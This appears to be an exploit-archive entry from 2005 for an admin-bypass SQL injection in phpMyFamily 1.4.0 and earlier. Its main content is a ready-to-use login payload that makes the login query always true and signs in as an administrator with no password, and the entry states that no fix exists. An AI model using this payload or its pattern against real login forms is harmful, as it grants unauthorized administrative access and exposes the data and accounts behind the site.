phpMyFamily <= 1.4.0 Admin Bypass SQL Injection

2005-03-21 00:00:00

# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.